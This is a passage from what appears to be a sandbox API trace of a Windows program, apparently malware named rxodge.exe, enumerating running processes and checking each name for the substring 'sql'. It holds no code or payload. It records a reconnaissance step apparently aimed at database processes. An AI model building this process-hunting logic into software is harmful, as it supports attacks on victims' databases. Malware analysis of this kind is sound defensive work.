dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3596408, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0219.320] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0219.320] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="sql") returned 0x0 [0219.320] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0219.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0219.321] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584970 [0219.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3584970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0219.322] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0219.322] StrStrIA (lpFirst="omnipos.exe", lpSrch="sql") returned 0x0 [0219.322] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0219.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0219.323] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35593d0 [0219.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x35593d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0219.323] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0219.323] StrStrIA (lpFirst="spcwin.exe", lpSrch="sql") returned 0x0 [0219.323] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0219.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0219.324] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3596428 [0219.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3596428, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0219.324] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0219.324] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="sql") returned 0x0 [0219.324] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0219.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0219.325] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35591c0 [0219.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x35591c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0219.325] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0219.325] StrStrIA (lpFirst="utg2.exe", lpSrch="sql") returned 0x0 [0219.325] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0219.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0219.326] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3570bc0 [0219.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3570bc0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0219.326] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0219.326] StrStrIA (lpFirst="saying.exe", lpSrch="sql") returned 0x0 [0219.326] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0219.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0219.327] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35f5420 [0219.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x35f5420, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0219.736] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0219.736] StrStrIA (lpFirst="ripe.exe", lpSrch="sql") returned 0x0 [0219.736] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0219.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.738] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35f5570 [0219.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x35f5570, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0219.738] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0219.738] StrStrIA (lpFirst="acoustic.exe", lpSrch="sql") returned 0x0 [0219.738] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0219.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0219.739] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35f5300 [0219.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x35f5300, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0219.739] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0219.739] StrStrIA (lpFirst="mail.exe", lpSrch="sql") returned 0x0 [0219.739] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.741] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35f54e0 [0219.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35f54e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0219.741] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0219.741] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0219.741] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0219.742] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35f5450 [0219.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35f5450, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0219.742] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0219.742] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0219.742] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0219.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0219.743] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35f5360 [0219.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x35f5360, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0219.743] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0219.743] StrStrIA (lpFirst="dllhost.exe", lpSrch="sql") returned 0x0 [0219.743] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0219.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0219.744] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35f5378 [0219.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35f5378, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0219.745] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0219.745] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0219.745] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0219.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0219.746] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596308 [0219.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3596308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0219.746] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0219.746] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="sql") returned 0x0 [0219.746] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0219.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0219.747] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35f53f0 [0219.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35f53f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0219.747] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0219.747] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0219.747] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0219.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0219.749] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35f5558 [0219.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x35f5558, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0219.749] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0219.749] StrStrIA (lpFirst="rxodge.exe", lpSrch="sql") returned 0x0 [0219.749] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0219.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0219.750] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35f53a8 [0219.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x35f53a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0219.750] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0219.750] StrStrIA (lpFirst="sppsvc.exe", lpSrch="sql") returned 0x0 [0219.750] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0219.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0219.751] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596648 [0219.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3596648, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0219.751] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0219.751] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="sql") returned 0x0 [0219.751] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0219.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.753] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35f53c0 [0219.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x35f53c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0219.753] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0219.753] StrStrIA (lpFirst="TiWorker.exe", lpSrch="sql") returned 0x0 [0219.753] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0219.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0219.754] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x358ebe0 [0219.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sc.exe", cchWideChar=-1, lpMultiByteStr=0x358ebe0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sc.exe", lpUsedDefaultChar=0x0) returned 7 [0219.754] lstrcpyA (in: lpString1=0x567fabc, lpString2="sc.exe" | out: lpString1="sc.exe") returned="sc.exe" [0219.754] StrStrIA (lpFirst="sc.exe", lpSrch="sql") returned 0x0 [0219.754] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0219.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIADAP.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0219.756] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35f5390 [0219.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIADAP.exe", cchWideChar=-1, lpMultiByteStr=0x35f5390, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WMIADAP.exe", lpUsedDefaultChar=0x0) returned 12 [0219.756] lstrcpyA (in: lpString1=0x567fabc, lpString2="WMIADAP.exe" | out: lpString1="WMIADAP.exe") returned="WMIADAP.exe" [0219.756] StrStrIA (lpFirst="WMIADAP.exe", lpSrch="sql") returned 0x0 [0219.756] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1158, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0219.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0219.757] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35f52d0 [0219.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35f52d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0219.757] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0219.757] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0219.757] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0219.758] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35f53d8 [0219.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35f53d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0219.758] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0219.758] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0219.758] Process32NextW (in: hSnapshot=0x38c, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x0, th32ParentProcessID=0x11dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0219.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0219.759] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35f5408 [0219.760] WideCharToMultiByte (in: CodePage=0x0, 